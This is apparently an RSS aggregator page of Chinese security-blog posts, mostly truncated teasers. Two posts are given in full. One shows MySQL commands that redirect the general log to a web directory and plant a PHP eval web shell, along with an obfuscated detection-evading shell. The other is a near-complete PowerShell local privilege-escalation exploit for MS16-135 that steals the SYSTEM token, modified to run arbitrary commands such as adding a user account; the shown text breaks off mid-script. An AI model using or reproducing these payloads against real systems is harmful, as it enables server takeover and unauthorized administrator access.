Embed this content in your HTML

Search

Edit this Super RSS.
Account: (login)

More Channels


Channel Catalog


Channel Description:

all things
    0 0
  • 11/05/16--20:57: ZMap之坑 (chan 69772724)
  • ZMap确实是个伟大的工具,但离伟大的社区、伟大的产品还有挺长的路要走。ZMap现在稳定版本是:zmap-2. […]

    0 0

    说 OAuth2.0 漏洞/这个协议不安全的人,把头伸过来下,砖头准备好了。 Black Hat 的有关 Pa […]

    0 0
  • 11/08/16--00:28: 记第10次印刷 (chan 69772724)
  • 《Web前端黑客技术揭秘》这本书2013.1月开售至今,已经第10次印刷,在安全类书籍中,这种成绩确实超出我们 […]

    0 0

    Seebug Paper之前收录了三篇文章有些关联性,分别是: 绕过混合内容警告 – 在安全的页面 […]

    0 0

    当代 Web 的 JSON 劫持技巧 http://paper.seebug.org/130/ 猥琐流的家伙居 […]

    0 0
  • 12/01/16--19:47: [PRE]CSRF攻击-进击的巨人 (chan 69772724)
  • 计划准备出一个PPT专门讲解CSRF里的各种奇技淫巧,除了那些老套的手法之外: https://github. […]

    0 0

    新年新气象,这个蠕虫我做了小范围测试,也提交了官方修复,小圈子里做了分享,这里正式对外公布下,出于研究而非破坏 […]

    0 0
  • 03/05/17--00:37: 蠕虫挖矿一例,无码 (chan 69772724)
  • 今天凌晨,我们的蜜网系统跳出了个有趣的字符串: zaxa2aq@protonmail.com ProtonMa […]

    0 0
  • 03/21/17--23:02: SQL语句利用日志写shell (chan 69772723)
  • outfile被禁止,或者写入文件被拦截;

    在数据库中操作如下:(必须是root权限)

    show variables like '%general%';  #查看配置
    
    set global general_log = on;  #开启general log模式
    
    set global general_log_file = '/var/www/html/1.php';   #设置日志目录为shell地址
    
    select '<?php eval($_POST[cmd]);?>'  #写入shell
    
    

    SQL查询免杀shell的语句

    SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"
    

    原文:戳我


    0 0
  • 04/09/17--22:28: MS16-135 带参数版 (chan 69772723)
  • 修改了一个带参数版的,方便用,代码如下:

    function Invoke-MS16-135 {
    <#
    .SYNOPSIS
        
        PowerShell implementation of MS16-135. The exploit targets all vulnerable
        operating systems that support PowerShell v2+. 
        
        * Win7-Win10 <== 64 bit!
    .PARAMETER Application
    Specifies an Application to run.
    .PARAMETER Commandline
    Specifies Commandline, such as net user xxx xxx /add
        
    .EXAMPLE
        C:\PS> Invoke-MS16-135 -Application C:\Windows\System32\cmd.exe
        C:\PS> Invoke-MS16-135 -Application C:\Windows\System32\cmd.exe -Commandline "/c net user 1 1 /add"
    #>
    [CmdletBinding()]
    param(
            [Parameter(Mandatory = $False, ParameterSetName = 'C:\Windows\System32\cmd.exe' )]
            [string]
            $Application,
    
            [Parameter(Mandatory = $False)]
            [string]
            $Commandline
    )
    Add-Type -TypeDefinition @"
    using System;
    using System.Diagnostics;
    using System.Runtime.InteropServices;
    using System.Security.Principal;
    
    [StructLayout(LayoutKind.Sequential)]
    public struct INPUT
    {
        public int itype;
        public KEYBDINPUT U;
        public int Size;
    }
    
    [StructLayout(LayoutKind.Sequential)]
    public struct KEYBDINPUT
    {
        public UInt16 wVk;
        public UInt16 wScan;
        public uint dwFlags;
        public int time;
        public IntPtr dwExtraInfo;
    }
    
    [StructLayout(LayoutKind.Sequential)] 
    public struct tagMSG  
    {  
        public IntPtr hwnd;
        public UInt32 message;
        public UIntPtr wParam;
        public UIntPtr lParam;
        public UInt32 time;
        public POINT pt;
    }
    
    public struct POINT
    {  
        public Int32 x;
        public Int32 Y;
    }
    
    public class ms16135
    {
        delegate IntPtr WndProc(
            IntPtr hWnd,
            uint msg,
            IntPtr wParam,
            IntPtr lParam);
    
        [System.Runtime.InteropServices.StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]
        struct WNDCLASSEX
        {
            public uint cbSize;
            public uint style;
            public IntPtr lpfnWndProc;
            public int cbClsExtra;
            public int cbWndExtra;
            public IntPtr hInstance;
            public IntPtr hIcon;
            public IntPtr hCursor;
            public IntPtr hbrBackground;
            [MarshalAs(UnmanagedType.LPWStr)]
            public string lpszMenuName;
            [MarshalAs(UnmanagedType.LPWStr)]
            public string lpszClassName;
            public IntPtr hIconSm;
        }
        
        [System.Runtime.InteropServices.DllImport("user32.dll", SetLastError = true)]
        static extern System.UInt16 RegisterClassW(
            [System.Runtime.InteropServices.In] ref WNDCLASSEX lpWndClass);
    
        [System.Runtime.InteropServices.DllImport("user32.dll", SetLastError = true)]
        public static extern IntPtr CreateWindowExW(
            UInt32 dwExStyle,
            [MarshalAs(UnmanagedType.LPWStr)]
            string lpClassName,
            [MarshalAs(UnmanagedType.LPWStr)]
            string lpWindowName,
            UInt32 dwStyle,
            Int32 x,
            Int32 y,
            Int32 nWidth,
            Int32 nHeight,
            IntPtr hWndParent,
            IntPtr hMenu,
            IntPtr hInstance,
            IntPtr lpParam);
    
        [System.Runtime.InteropServices.DllImport("user32.dll", SetLastError = true)]
        static extern System.IntPtr DefWindowProcW(
            IntPtr hWnd,
            uint msg,
            IntPtr wParam,
            IntPtr lParam);
    
        [System.Runtime.InteropServices.DllImport("user32.dll", SetLastError = true)]
        public static extern bool DestroyWindow(
            IntPtr hWnd);
    
        [DllImport("user32.dll", SetLastError = true)]
        public static extern bool UnregisterClass(
            String lpClassName,
            IntPtr hInstance);
    
        [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetModuleHandleW(
            [MarshalAs(UnmanagedType.LPWStr)]
            String lpModuleName);
    
        [DllImport("user32.dll", EntryPoint="SetWindowLongPtr")]
        public static extern IntPtr SetWindowLongPtr(
            IntPtr hWnd,
            int nIndex,
            IntPtr dwNewLong);
    
        [DllImport("user32.dll")]
        public static extern bool ShowWindow(
            IntPtr hWnd,
            int nCmdShow);
    
        [DllImport("user32.dll", SetLastError = true)]
        public static extern IntPtr SetParent(
            IntPtr hWndChild,
            IntPtr hWndNewParent);
    
        [DllImport("user32.dll", SetLastError = false)]
        public static extern IntPtr GetDesktopWindow();
    
        [DllImport("user32.dll")]
        public static extern bool SetForegroundWindow(
            IntPtr hWnd);
    
        [DllImport("user32.dll", SetLastError=true)]
        public static extern void SwitchToThisWindow(
            IntPtr hWnd,
            bool fAltTab);
    
        [DllImport("user32.dll")]
        public static extern bool GetMessage(
            out tagMSG lpMsg,
            IntPtr hWnd,
            uint wMsgFilterMin,
            uint wMsgFilterMax);
    
        [DllImport("user32.dll")]
        public static extern bool TranslateMessage(
            [In] ref tagMSG lpMsg);
    
        [DllImport("user32.dll")]
        public static extern IntPtr DispatchMessage(
            [In] ref tagMSG lpmsg);
    
        [DllImport("user32.dll", SetLastError = true)]
        public static extern IntPtr SetFocus(
            IntPtr hWnd);
    
        [DllImport("user32.dll")]
        public static extern uint SendInput(
            uint nInputs, 
            [In] INPUT pInputs, 
            int cbSize);
    
        [DllImport("gdi32.dll")]
        public static extern int GetBitmapBits(
            IntPtr hbmp,
            int cbBuffer,
            IntPtr lpvBits);
    
        [DllImport("gdi32.dll")]
        public static extern int SetBitmapBits(
            IntPtr hbmp,
            int cbBytes,
            IntPtr lpBits);
    
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr VirtualAlloc(
            IntPtr lpAddress,
            uint dwSize,
            UInt32 flAllocationType,
            UInt32 flProtect);
    
        public UInt16 CustomClass(string class_name)
        {
            m_wnd_proc_delegate = CustomWndProc;
            WNDCLASSEX wind_class = new WNDCLASSEX();
            wind_class.lpszClassName = class_name;
            ///wind_class.cbSize = (uint)Marshal.SizeOf(wind_class);
            wind_class.lpfnWndProc = System.Runtime.InteropServices.Marshal.GetFunctionPointerForDelegate(m_wnd_proc_delegate);
            return RegisterClassW(ref wind_class);
        }
    
        private static IntPtr CustomWndProc(IntPtr hWnd, uint msg, IntPtr wParam, IntPtr lParam)
        {
            return DefWindowProcW(hWnd, msg, wParam, lParam);
        }
    
        private WndProc m_wnd_proc_delegate;
    }
    "@
    
    #==============================================================[Banner]
        $ms16135 = @"
         _____ _____ ___   ___     ___   ___ ___ 
        |     |   __|_  | |  _|___|_  | |_  |  _|
        | | | |__   |_| |_| . |___|_| |_|_  |_  |
        |_|_|_|_____|_____|___|   |_____|___|___|
                                            
                           [by b33f -> @FuzzySec]
                           
    "@
    $ms16135
    
    #==============================================================[Pre-Run]
    # Exploit is only for x64
    if ([System.IntPtr]::Size -ne 8) {
        echo "`n[!] Target architecture is x64 only!`n"
        Return
    }
    
    # Get OS version
    $OSVersion = [Version](Get-WmiObject Win32_OperatingSystem).Version
    $Script:OSMajorMinor = "$($OSVersion.Major).$($OSVersion.Minor)"
    switch ($OSMajorMinor)
    {
        '10.0' # Win10 / 2k16
        {
            echo "[?] Target is Win 10"
            echo "[+] Bitmap dimensions: 0x760*0x4`n"
        }
    
        '6.3' # Win8.1 / 2k12R2
        {
            echo "[?] Target is Win 8.1"
            echo "[+] Bitmap dimensions: 0x760*0x4`n"
        }
    
        '6.2' # Win8 / 2k12
        {
            echo "[?] Target is Win 8"
            echo "[+] Bitmap dimensions: 0x760*0x4`n"
        }
    
        '6.1' # Win7 / 2k8R2
        {
            echo "[?] Target is Win 7"
            echo "[+] Bitmap dimensions: 0x770*0x4`n"
        }
    }
    
    #==============================================================[Helpers]
    function Get-LoadedModules {
    <#
    .SYNOPSIS
        Use NtQuerySystemInformation::SystemModuleInformation to get a list of
        loaded modules, their base address and size (x32/x64).
    
        Note: Low integrity only pre 8.1
    
    .DESCRIPTION
        Author: Ruben Boonen (@FuzzySec)
        License: BSD 3-Clause
        Required Dependencies: None
        Optional Dependencies: None
    
    .EXAMPLE
        C:\PS> $Modules = Get-LoadedModules
        C:\PS> $KernelBase = $Modules[0].ImageBase
        C:\PS> $KernelType = ($Modules[0].ImageName -split "\\")[-1]
        C:\PS> ......
    #>
    
        Add-Type -TypeDefinition @"
        using System;
        using System.Diagnostics;
        using System.Runtime.InteropServices;
        using System.Security.Principal;
    
        [StructLayout(LayoutKind.Sequential, Pack = 1)]
        public struct SYSTEM_MODULE_INFORMATION
        {
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)]
            public UIntPtr[] Reserved;
            public IntPtr ImageBase;
            public UInt32 ImageSize;
            public UInt32 Flags;
            public UInt16 LoadOrderIndex;
            public UInt16 InitOrderIndex;
            public UInt16 LoadCount;
            public UInt16 ModuleNameOffset;
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 256)]
            internal Char[] _ImageName;
            public String ImageName {
                get {
                    return new String(_ImageName).Split(new Char[] {'\0'}, 2)[0];
                }
            }
        }
    
        public static class Ntdll
        {
            [DllImport("ntdll.dll")]
            public static extern int NtQuerySystemInformation(
                int SystemInformationClass,
                IntPtr SystemInformation,
                int SystemInformationLength,
                ref int ReturnLength);
        }
    "@
    
        [int]$BuffPtr_Size = 0
        while ($true) {
            [IntPtr]$BuffPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($BuffPtr_Size)
            $SystemInformationLength = New-Object Int
        
            # SystemModuleInformation Class = 11
            $CallResult = [Ntdll]::NtQuerySystemInformation(11, $BuffPtr, $BuffPtr_Size, [ref]$SystemInformationLength)
            
            # STATUS_INFO_LENGTH_MISMATCH
            if ($CallResult -eq 0xC0000004) {
                [System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr)
                [int]$BuffPtr_Size = [System.Math]::Max($BuffPtr_Size,$SystemInformationLength)
            }
            # STATUS_SUCCESS
            elseif ($CallResult -eq 0x00000000) {
                break
            }
            # Probably: 0xC0000005 -> STATUS_ACCESS_VIOLATION
            else {
                [System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr)
                return
            }
        }
    
        $SYSTEM_MODULE_INFORMATION = New-Object SYSTEM_MODULE_INFORMATION
        $SYSTEM_MODULE_INFORMATION = $SYSTEM_MODULE_INFORMATION.GetType()
        if ([System.IntPtr]::Size -eq 4) {
            $SYSTEM_MODULE_INFORMATION_Size = 284
        } else {
            $SYSTEM_MODULE_INFORMATION_Size = 296
        }
    
        $BuffOffset = $BuffPtr.ToInt64()
        $HandleCount = [System.Runtime.InteropServices.Marshal]::ReadInt32($BuffOffset)
        $BuffOffset = $BuffOffset + [System.IntPtr]::Size
    
        $SystemModuleArray = @()
        for ($i=0; $i -lt $HandleCount; $i++){
            $SystemPointer = New-Object System.Intptr -ArgumentList $BuffOffset
            $Cast = [system.runtime.interopservices.marshal]::PtrToStructure($SystemPointer,[type]$SYSTEM_MODULE_INFORMATION)
            
            $HashTable = @{
                ImageName = $Cast.ImageName
                ImageBase = if ([System.IntPtr]::Size -eq 4) {$($Cast.ImageBase).ToInt32()} else {$($Cast.ImageBase).ToInt64()}
                ImageSize = "0x$('{0:X}' -f $Cast.ImageSize)"
            }
            
            $Object = New-Object PSObject -Property $HashTable
            $SystemModuleArray += $Object
        
            $BuffOffset = $BuffOffset + $SYSTEM_MODULE_INFORMATION_Size
        }
    
        $SystemModuleArray
    
        # Free SystemModuleInformation array
        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr)
    }
    
    function Stage-gSharedInfoBitmap {
    <#
    .SYNOPSIS
        Universal Bitmap leak using accelerator tables, 32/64 bit Win7-10 (post anniversary).
    
    .DESCRIPTION
        Author: Ruben Boonen (@FuzzySec)
        License: BSD 3-Clause
        Required Dependencies: None
        Optional Dependencies: None
    
    .EXAMPLE
        PS C:\Users\b33f> Stage-gSharedInfoBitmap |fl
        
        BitmapKernelObj : -7692235059200
        BitmappvScan0   : -7692235059120
        BitmapHandle    : 1845828432
        
        PS C:\Users\b33f> $Manager = Stage-gSharedInfoBitmap
        PS C:\Users\b33f> "{0:X}" -f $Manager.BitmapKernelObj
        FFFFF901030FF000
    #>
    
        Add-Type -TypeDefinition @"
        using System;
        using System.Diagnostics;
        using System.Runtime.InteropServices;
        using System.Security.Principal;
    
        public static class gSharedInfoBitmap
        {
            [DllImport("gdi32.dll")]
            public static extern IntPtr CreateBitmap(
                int nWidth,
                int nHeight,
                uint cPlanes,
                uint cBitsPerPel,
                IntPtr lpvBits);
    
            [DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]
            public static extern IntPtr LoadLibrary(
                string lpFileName);
            
            [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)]
            public static extern IntPtr GetProcAddress(
                IntPtr hModule,
                string procName);
    
            [DllImport("user32.dll")]
            public static extern IntPtr CreateAcceleratorTable(
                IntPtr lpaccl,
                int cEntries);
    
            [DllImport("user32.dll")]
            public static extern bool DestroyAcceleratorTable(
                IntPtr hAccel);
        }
    "@
    
        # Check Arch
        if ([System.IntPtr]::Size -eq 4) {
            $x32 = 1
        }
    
        function Create-AcceleratorTable {
            [IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(10000)
            $AccelHandle = [gSharedInfoBitmap]::CreateAcceleratorTable($Buffer, 700) # +4 kb size
            $User32Hanle = [gSharedInfoBitmap]::LoadLibrary("user32.dll")
            $gSharedInfo = [gSharedInfoBitmap]::GetProcAddress($User32Hanle, "gSharedInfo")
            if ($x32){
                $gSharedInfo = $gSharedInfo.ToInt32()
            } else {
                $gSharedInfo = $gSharedInfo.ToInt64()
            }
            $aheList = $gSharedInfo + [System.IntPtr]::Size
            if ($x32){
                $aheList = [System.Runtime.InteropServices.Marshal]::ReadInt32($aheList)
                $HandleEntry = $aheList + ([int]$AccelHandle -band 0xffff)*0xc # _HANDLEENTRY.Size = 0xC
                $phead = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleEntry)
            } else {
                $aheList = [System.Runtime.InteropServices.Marshal]::ReadInt64($aheList)
                $HandleEntry = $aheList + ([int]$AccelHandle -band 0xffff)*0x18 # _HANDLEENTRY.Size = 0x18
                $phead = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleEntry)
            }
    
            $Result = @()
            $HashTable = @{
                Handle = $AccelHandle
                KernelObj = $phead
            }
            $Object = New-Object PSObject -Property $HashTable
            $Result += $Object
            $Result
        }
    
        function Destroy-AcceleratorTable {
            param ($Hanlde)
            $CallResult = [gSharedInfoBitmap]::DestroyAcceleratorTable($Hanlde)
        }
    
        $KernelArray = @()
        for ($i=0;$i -lt 20;$i++) {
            $KernelArray += Create-AcceleratorTable
            if ($KernelArray.Length -gt 1) {
                if ($KernelArray[$i].KernelObj -eq $KernelArray[$i-1].KernelObj) {
                    Destroy-AcceleratorTable -Hanlde $KernelArray[$i].Handle
                    [IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x50*2*4)
                    if ($OSMajorMinor -eq "6.1") { 
                        $BitmapHandle = [gSharedInfoBitmap]::CreateBitmap(0x770, 4, 1, 8, $Buffer) # Win7
                    } else {
                        $BitmapHandle = [gSharedInfoBitmap]::CreateBitmap(0x760, 4, 1, 8, $Buffer) # Win8-10
                    }
                    break
                }
            }
            Destroy-AcceleratorTable -Hanlde $KernelArray[$i].Handle
        }
    
        $BitMapObject = @()
        $HashTable = @{
            BitmapHandle = $BitmapHandle
            BitmapKernelObj = $($KernelArray[$i].KernelObj)
            BitmappvScan0 = if ($x32) {$($KernelArray[$i].KernelObj) + 0x32} else {$($KernelArray[$i].KernelObj) + 0x50}
        }
        $Object = New-Object PSObject -Property $HashTable
        $BitMapObject += $Object
        $BitMapObject
    }
    
    function Bitmap-Elevate {
        param([IntPtr]$ManagerBitmap,[IntPtr]$WorkerBitmap)
    
        Add-Type -TypeDefinition @"
        using System;
        using System.Diagnostics;
        using System.Runtime.InteropServices;
        using System.Security.Principal;
        public static class BitmapElevate
        {
            [DllImport("gdi32.dll")]
            public static extern int SetBitmapBits(
                IntPtr hbmp,
                uint cBytes,
                byte[] lpBits);
            [DllImport("gdi32.dll")]
            public static extern int GetBitmapBits(
                IntPtr hbmp,
                int cbBuffer,
                IntPtr lpvBits);
            [DllImport("kernel32.dll", SetLastError = true)]
            public static extern IntPtr VirtualAlloc(
                IntPtr lpAddress,
                uint dwSize,
                UInt32 flAllocationType,
                UInt32 flProtect);
            [DllImport("kernel32.dll", SetLastError=true)]
            public static extern bool VirtualFree(
                IntPtr lpAddress,
                uint dwSize,
                uint dwFreeType);
            [DllImport("kernel32.dll", SetLastError=true)]
            public static extern bool FreeLibrary(
                IntPtr hModule);
            [DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]
            public static extern IntPtr LoadLibrary(
                string lpFileName);
            [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)]
            public static extern IntPtr GetProcAddress(
                IntPtr hModule,
                string procName);
        }
    "@
    
        # Arbitrary Kernel read
        function Bitmap-Read {
            param ($Address)
            $CallResult = [BitmapElevate]::SetBitmapBits($ManagerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Address))
            [IntPtr]$Pointer = [BitmapElevate]::VirtualAlloc([System.IntPtr]::Zero, [System.IntPtr]::Size, 0x3000, 0x40)
            $CallResult = [BitmapElevate]::GetBitmapBits($WorkerBitmap, [System.IntPtr]::Size, $Pointer)
            if ($x32Architecture){
                [System.Runtime.InteropServices.Marshal]::ReadInt32($Pointer)
            } else {
                [System.Runtime.InteropServices.Marshal]::ReadInt64($Pointer)
            }
            $CallResult = [BitmapElevate]::VirtualFree($Pointer, [System.IntPtr]::Size, 0x8000)
        }
        
        # Arbitrary Kernel write
        function Bitmap-Write {
            param ($Address, $Value)
            $CallResult = [BitmapElevate]::SetBitmapBits($ManagerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Address))
            $CallResult = [BitmapElevate]::SetBitmapBits($WorkerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Value))
        }
    
        switch ($OSMajorMinor)
        {
            '10.0' # Win10 / 2k16
            {
                $UniqueProcessIdOffset = 0x2e8
                $TokenOffset = 0x358          
                $ActiveProcessLinks = 0x2f0
            }
        
            '6.3' # Win8.1 / 2k12R2
            {
                $UniqueProcessIdOffset = 0x2e0
                $TokenOffset = 0x348          
                $ActiveProcessLinks = 0x2e8
            }
        
            '6.2' # Win8 / 2k12
            {
                $UniqueProcessIdOffset = 0x2e0
                $TokenOffset = 0x348          
                $ActiveProcessLinks = 0x2e8
            }
        
            '6.1' # Win7 / 2k8R2
            {
                $UniqueProcessIdOffset = 0x180
                $TokenOffset = 0x208          
                $ActiveProcessLinks = 0x188
            }
        }
        
        # Get EPROCESS entry for System process
        echo "`n[>] Leaking SYSTEM _EPROCESS.."
        $SystemModuleArray = Get-LoadedModules
        $KernelBase = $SystemModuleArray[0].ImageBase
        $KernelType = ($SystemModuleArray[0].ImageName -split "\\")[-1]
        $KernelHanle = [BitmapElevate]::LoadLibrary("$KernelType")
        $PsInitialSystemProcess = [BitmapElevate]::GetProcAddress($KernelHanle, "PsInitialSystemProcess")
        $SysEprocessPtr = if (!$x32Architecture) {$PsInitialSystemProcess.ToInt64() - $KernelHanle + $KernelBase} else {$PsInitialSystemProcess.ToInt32() - $KernelHanle + $KernelBase}
        $CallResult = [BitmapElevate]::FreeLibrary($KernelHanle)
        echo "[+] _EPROCESS list entry: 0x$("{0:X}" -f $SysEprocessPtr)"
        $SysEPROCESS = Bitmap-Read -Address $SysEprocessPtr
        echo "[+] SYSTEM _EPROCESS address: 0x$("{0:X}" -f $(Bitmap-Read -Address $SysEprocessPtr))"
        echo "[+] PID: $(Bitmap-Read -Address $($SysEPROCESS+$UniqueProcessIdOffset))"
        echo "[+] SYSTEM Token: 0x$("{0:X}" -f $(Bitmap-Read -Address $($SysEPROCESS+$TokenOffset)))"
        $SysToken = Bitmap-Read -Address $($SysEPROCESS+$TokenOffset)
        
        # Get EPROCESS entry for current process
        echo "`n[>] Leaking current _EPROCESS.."
        echo "[+] Traversing ActiveProcessLinks list"
        $NextProcess = $(Bitmap-Read -Address $($SysEPROCESS+$ActiveProcessLinks)) - $UniqueProcessIdOffset - [System.IntPtr]::Size
        while($true) {
            $NextPID = Bitmap-Read -Address $($NextProcess+$UniqueProcessIdOffset)
            if ($NextPID -eq $PID) {
                echo "[+] PowerShell _EPROCESS address: 0x$("{0:X}" -f $NextProcess)"
                echo "[+] PID: $NextPID"
                echo "[+] PowerShell Token: 0x$("{0:X}" -f $(Bitmap-Read -Address $($NextProcess+$TokenOffset)))"
                $PoShTokenAddr = $NextProcess+$TokenOffset
                break
            }
            $NextProcess = $(Bitmap-Read -Address $($NextProcess+$ActiveProcessLinks)) - $UniqueProcessIdOffset - [System.IntPtr]::Size
        }
        
        # Duplicate token!
        echo "`n[!] Duplicating SYSTEM token!`n"
        Bitmap-Write -Address $PoShTokenAddr -Value $SysToken
    }
    
    #==============================================================[Keyboard Functions]
    # See: https://msdn.microsoft.com/en-us/library/ms927178.aspx
    function Sim-KeyDown {
        param([Int]$wKey)
        $KeyboardInput = New-Object KEYBDINPUT
        $KeyboardInput.dwFlags = 0
        $KeyboardInput.wVk = $wKey
    
        $InputObject = New-Object INPUT
        $InputObject.itype = 1
        $InputObject.U = $KeyboardInput
        $InputSize = [System.Runtime.InteropServices.Marshal]::SizeOf($InputObject)
        
        $CallResult = [ms16135]::SendInput(1, $InputObject, $InputSize)
        if ($CallResult -eq 1) {
            $true
        } else {
            $false
        }
    }
    
    function Sim-KeyUp {
        param([Int]$wKey)
        $KeyboardInput = New-Object KEYBDINPUT
        $KeyboardInput.dwFlags = 2
        $KeyboardInput.wVk = $wKey
        
        $InputObject = New-Object INPUT
        $InputObject.itype = 1
        $InputObject.U = $KeyboardInput
        $InputSize = [System.Runtime.InteropServices.Marshal]::SizeOf($InputObject)
        
        $CallResult = [ms16135]::SendInput(1, $InputObject, $InputSize)
        if ($CallResult -eq 1) {
            $true
        } else {
            $false
        }
    }
    
    function Do-AltShiftEsc {
        $CallResult = Sim-KeyDown -wKey 0x12 # VK_MENU
        $CallResult = Sim-KeyDown -wKey 0x10 # VK_SHIFT
        $CallResult = Sim-KeyDown -wKey 0x1b # VK_ESCAPE
        $CallResult = Sim-KeyUp -wKey 0x1b   # VK_ESCAPE
        $CallResult = Sim-KeyDown -wKey 0x1b # VK_ESCAPE
        $CallResult = Sim-KeyUp -wKey 0x1b   # VK_ESCAPE
        $CallResult = Sim-KeyUp -wKey 0x12   # VK_MENU
        $CallResult = Sim-KeyUp -wKey 0x10   # VK_SHIFT
    }
    
    function Do-AltShiftTab {
        param([Int]$Count)
        $CallResult = Sim-KeyDown -wKey 0x12    # VK_MENU
        $CallResult = Sim-KeyDown -wKey 0x10    # VK_SHIFT
        for ($i=0;$i -lt $count;$i++) {
            $CallResult = Sim-KeyDown -wKey 0x9 # VK_TAB
            $CallResult = Sim-KeyUp -wKey 0x9   # VK_TAB
        }
        $CallResult = Sim-KeyUp -wKey 0x12      # VK_MENU
        $CallResult = Sim-KeyUp -wKey 0x10      # VK_SHIFT
    }
    
    #==============================================================[Create-Bitmaps]
    do {
        $Bitmap1 = Stage-gSharedInfoBitmap
        $Bitmap2 = Stage-gSharedInfoBitmap
        if ($Bitmap1.BitmapKernelObj -lt $Bitmap2.BitmapKernelObj) {
            $WorkerBitmap = $Bitmap1
            $ManagerBitmap = $Bitmap2
        } else {
            $WorkerBitmap = $Bitmap2
            $ManagerBitmap = $Bitmap1
        }
        $Distance = $ManagerBitmap.BitmapKernelObj - $WorkerBitmap.BitmapKernelObj
    } while ($Distance -ne 0x2000)
    
    echo "[?] Adjacent large session pool feng shui.."
    echo "[+] Worker  : $('{0:X}' -f $WorkerBitmap.BitmapKernelObj)"
    echo "[+] Manager : $('{0:X}' -f $ManagerBitmap.BitmapKernelObj)"
    echo "[+] Distance: 0x$('{0:X}' -f $Distance)"
    
    # Address of the y-coordinate for the bitmap
    $TargetAddress = $WorkerBitmap.BitmapKernelObj + 63
    
    #==============================================================[Trigger Function]
    function Do-OrAddress {
        param([Int64]$Address)
    
        # Create WNDCLASSEX atom
        $AtomCreate = New-Object ms16135
        $hAtom = $AtomCreate.CustomClass("cve-2016-7255")
        if ($hAtom -eq 0){
            break
        }
    
        echo "`n[?] Creating Window objects"
        $hMod = [ms16135]::GetModuleHandleW([String]::Empty)
        # WS_OVERLAPPEDWINDOW|WS_VISIBLE
        $hWndParent = [ms16135]::CreateWindowExW(0,"cve-2016-7255",[String]::Empty,0x10CF0000,0,0,360,360,[IntPtr]::Zero,[IntPtr]::Zero,$hMod,[IntPtr]::Zero)
        if ($hWndParent -eq 0){
            break
        }
    
        # WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD
        $hWndChild = [ms16135]::CreateWindowExW(0,"cve-2016-7255","cve-2016-7255",0x50CF0000,0,0,160,160,$hWndParent,[IntPtr]::Zero,$hMod,[IntPtr]::Zero)
        if ($hWndChild -eq 0){
            break
        }
    
        # Align target
        $Address = $Address - 0x28
    
        echo "[+] Corrupting child window spmenu"
        # manipulate child spmenu
        $CallResult = [ms16135]::SetWindowLongPtr($hWndChild,-12,[IntPtr]$Address)
    
        # Window magic
        $CallResult = [ms16135]::ShowWindow($hWndParent,1)
        $hDesktopWindow = [ms16135]::GetDesktopWindow()
        $CallResult = [ms16135]::SetParent($hWndChild,$hDesktopWindow)
        $CallResult = [ms16135]::SetForegroundWindow($hWndChild)
    
        Do-AltShiftTab -Count 4
    
        $CallResult = [ms16135]::SwitchToThisWindow($hWndChild,$true)
    
        Do-AltShiftEsc
    
        # This is a bit messy, but the bug is not easy to trigger
        # while also reliably exiting the loop. Basically we try to
        # trigger the arbitrary "Or" for 3 seconds and then check if
        # it was successful. If not we try up to ten times (should
        # take 2-4 attempts).
        function Trigger-Write {
            $SafeGuard = [diagnostics.stopwatch]::StartNew()
            while ($SafeGuard.ElapsedMilliseconds -lt 3000) {
                $tagMSG = New-Object tagMSG
                if ($([ms16135]::GetMessage([ref]$tagMSG,[IntPtr]::Zero,0,0))) {
                    $CallResult = [ms16135]::SetFocus($hWndParent) #
                    for ($i=0;$i-lt20;$i++){Do-AltShiftEsc}        #
                    $CallResult = [ms16135]::SetFocus($hWndChild)  # Bug triggers here!
                    for ($i=0;$i-lt20;$i++){Do-AltShiftEsc}        #
                    $CallResult = [ms16135]::TranslateMessage([ref]$tagMSG)
                    $CallResult = [ms16135]::DispatchMessage([ref]$tagMSG)
                }
            } $SafeGuard.Stop()
        }
        [IntPtr]$Global:BytePointer = [ms16135]::VirtualAlloc([System.IntPtr]::Zero, 0x2000, 0x3000, 0x40)
        do {
            echo "[+] Trying to trigger arbitrary 'Or'.."
            $ByteRead = [ms16135]::GetBitmapBits($WorkerBitmap.BitmapHandle,0x2000,$BytePointer)
            Trigger-Write
            $LoopCount += 1
        } while ($ByteRead -ne 0x2000 -And $LoopCount -lt 10)
    
        # Clean up
        $CallResult = [ms16135]::DestroyWindow($hWndChild)
        $CallResult = [ms16135]::DestroyWindow($hWndParent)
        $CallResult = [ms16135]::UnregisterClass("cve-2016-7255",[IntPtr]::Zero)
        
        # Because shit happens, or patched
        if ($LoopCount -eq 10) {
            echo "`n[!] Bug did not trigger, try again or patched?`n"
            $Script:BugNotTriggered = 1
        }
    }
    
    Do-OrAddress -Address $TargetAddress
    if ($BugNotTriggered) {
        Return
    }
    
    #==============================================================[Set pvScan0 Manger]
    # Calculate offset
    if ($OSMajorMinor -eq "6.1") {
        $SizeVal = 0x400000770
    } else {
        $SizeVal = 0x400000760
    }
    do {
        $Read64 = [System.Runtime.InteropServices.Marshal]::ReadInt64($BytePointer.ToInt64() + $LoopCount)
        if ($Read64 -eq $SizeVal) {
